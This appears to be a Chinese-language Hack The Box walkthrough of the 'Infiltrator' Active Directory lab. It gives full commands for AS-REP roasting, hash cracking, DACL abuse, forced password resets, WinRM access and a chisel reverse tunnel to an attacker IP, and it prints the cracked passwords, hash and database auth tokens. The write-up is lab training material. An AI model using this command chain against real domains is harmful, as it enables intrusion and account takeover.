HTB-Infiltrator笔记

admin 2024年9月25日23:30:54评论125 views字数 4800阅读16分0秒阅读模式

HTB-Infiltrator笔记

扫描靶机

nmap -A -v -T4 10.10.11.31

HTB-Infiltrator笔记

HTB-Infiltrator笔记

HTB-Infiltrator笔记

扫出了域名infiltrator.htb,dc01.infiltrator.htb,先打开网页看看

HTB-Infiltrator笔记

在这里底下有一些用户

HTB-Infiltrator笔记

跑了一下目录没什么收获

HTB-Infiltrator笔记

收集网页里面的人物名字,然后进行枚举

impacket-GetNPUsers -request -usersfile user.txt -dc-ip dc01.infiltrator.htb 'infiltrator.htb/'David.Andersond.andersonOlivia.Martinezo.martinezKevin.Turnerk.turnerAmanda.Walkera.walkerMarcus.Harrism.harrisLauren.clarkl.clarkEthan.Rodrigueze.rodriguez

HTB-Infiltrator笔记

成果的跑出来了一个哈希,保存然后进行破解

$krb5asrep$23$l.clark@INFILTRATOR.HTB:2dd4d248bbdf0c2547a249a3868b2898$743984833d3cbb92c7f0abc69304510768cf85145c8464c03d80908811f0175dd06042eceede8250b458e51c6a9ab644bf391f27929228d9ed84b8ec39cb2357ed8d02de6c43b48761e77575f0f3bfc7095655ed26b1ffc5ddcb896d25aa5d900ef7c1e9252104d2ff57b1e917edc40562027aaba53a8d4ca97cd0b68b6bdc8ffb13c4a915964c71f9eb9fafef11e60f4094878a061406de4872035c2f2c400449330a2dd200509fb4938345cd3a8fc2e32c42fd2e5b1fa81d9dd50514a66893232fdb36d9689525d5b1e47bb312268499bb99f20b8ddbb19563e387bb2166c94876a811fd6ca1fb8d43b7ff1eb01c565e06john --wordlist=/home/kali/rockyou.txt hash

HTB-Infiltrator笔记

成果破解出密码,密码是:WAT?watismypass!,使用cme枚举一下

crackmapexec smb infiltrator.htb -u user.txt -p 'WAT?watismypass!' --shares

HTB-Infiltrator笔记

可以得知l.clark对应该密码,但是无法使用winrm登录的,使用bloodhound抓一下内网关系

bloodhound-python -u l.clark -p 'WAT?watismypass!' -d infiltrator.htb -ns 10.10.11.31 -c all

HTB-Infiltrator笔记

HTB-Infiltrator笔记

d.anderson的密码可以通过kerbrute枚举出来的,但是要先配置krb5.conf

可以看到D.ANDERSON对MARKETING DIGITAL OU 的 GenericAll 权限,这个可以影响ou里面的所有用户,E.RODRIGUEZ 可以通过其 AddSelf 权限将自己添加到 CHIEFS MARKETING 安全组中,从而继承更多的权限,包括可能影响 M.HARRIS 的账户,通过 dacledit.py 脚本,向 bloodhound中 OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB 这个组织单元授予用户 d.anderson 完全控制(FullControl)权限,并且这个权限是可继承的,首先生成d.anderson票据,然后导入

impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!'export KRB5CCNAME=d.anderson.ccache

HTB-Infiltrator笔记

接下来使用dacledit.py工具

python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31

HTB-Infiltrator笔记

现在MARKETING DIGITAL ou成功的被d.anderson 接管了,有完全控制权,接下来修E.RODRIGUEZ的用户密码,使用bloodyAD工具,通过Kerberos 协议进行身份验证,将用户e.rodriguez密码修改

bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p 'WAT?watismypass!' set password "e.rodriguez" 'WAT?watismypass!'

HTB-Infiltrator笔记

密码修改成功了,然后生成e.rodriguez票据再导入

impacket-getTGT infiltrator.htb/e.rodriguez:'WAT?watismypass!'export KRB5CCNAME=e.rodriguez.ccache

HTB-Infiltrator笔记

接下来使用AddSelf属性,因为成功的修改了e.rodriguez密码,并且e.rodriguez可以将自己添加到CHIEFS MARKETING组里面,继续使用bloodyAD工具

HTB-Infiltrator笔记

bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez

HTB-Infiltrator笔记

成功的添加,现在E.RODRIGUEZ用户是CHIEFS MARKETING组成员了,继续看bloodhound,CHIEFS MARKETING组对M.HARRIS成员ForceChangePassword属性,说明了CHIEFS MARKETING组里面的成员,可以强制修改M.HARRIS用户的密码,继续使用bloodyAD工具修改密码

HTB-Infiltrator笔记

bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p 'WAT?watismypass!' set password "m.harris" 'WAT?watismypass!'impacket-getTGT infiltrator.htb/m.harris:'WAT?watismypass!'export KRB5CCNAME=m.harris.ccache

HTB-Infiltrator笔记

成功的生成了m.harris票据,然后导入,使用evil登录winrm,成功拿到user flag

evil-winrm -i dc01.infiltrator.htb -i 'm.harris' -r infiltrator.htb

HTB-Infiltrator笔记

上传一个winpess看看有没有提权的地方,可以找到一个K.turner的密码:MessengerApp@Pass!

HTB-Infiltrator笔记

该用户直接使用winrm是无法登录的,查看一下后台端口

HTB-Infiltrator笔记

可以看到一堆14开头的端口,全部代理出来

chisel server --reverse --port 1132chisel-1-7-6.exe client 10.10.14.9:1132 R:14118:127.0.0.1:14118 R:14119:127.0.0.1:14119 R:14121:127.0.0.1:14121 R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 R:14125:127.0.0.1:14125 R:14126:127.0.0.1:14126 R:14127:127.0.0.1:14127 R:14128:127.0.0.1:14128 R:14130:127.0.0.1:14130 R:14406:127.0.0.1:14406

HTB-Infiltrator笔记

当打开到14406端口时候,出现了该信息,但是是乱码,直接进入到winpeas那里的路径

HTB-Infiltrator笔记

HTB-Infiltrator笔记

可以看到里面有几个压缩包

HTB-Infiltrator笔记

将其全部下载下来

HTB-Infiltrator笔记

解压到OutputMessengerMysql.zip,里面有个my.ini,可以找到账号

HTB-Infiltrator笔记

之前代理出来的14406,直接在本地运行

mysql -h 127.0.0.1 -P 14406  --skip-ssl -u root -p

HTB-Infiltrator笔记

直接进入到outputwall数据库,可以找到

MariaDB [outputwall]> select * from ot_wall_tokens;+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+| token_id | user_id | first_name | email                     | user_role | entity_id | auth_token                                                                    | expiry_date         |+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+|        1 |       7 | K.turner   | [email protected]    | U         |         1 | iX9Z/yslevNIY0R6aKNzBebgT_KpW4BlaGHjWS1zpd5QcmaRx8UGwBvaMxy3Q3Wb2E5XhI9lpIo= | 2024-02-22 00:00:00 ||        7 |       9 | winrm_svc  | [email protected] | U         |         1 | iX9Z/yslevMmHLWW_pvaVChN6kbwB_cbGHvAA75yee65xBQMd20Dgmf2iXD18Oq9hiwcgIfB1uo= | 2024-02-26 00:00:00 ||       16 |       1 | Admin      |                           | A         |         1 | iX9Z/yslevMJZgSfyKCEdHJE3RjYRSAMORYGfFRYTag9N3WBn20KJuZP_uPSRx_Q             | 2024-09-02 00:00:00 |+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+

HTB-Infiltrator笔记

非预期

可以直接通过数据库的load_file可以读取admin权限的文件

HTB-Infiltrator笔记

原文始发于微信公众号(Jiyou too beautiful):HTB-Infiltrator笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日23:30:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Infiltrator笔记https://cn-sec.com/archives/3124819.html

发表评论

匿名网友 填写信息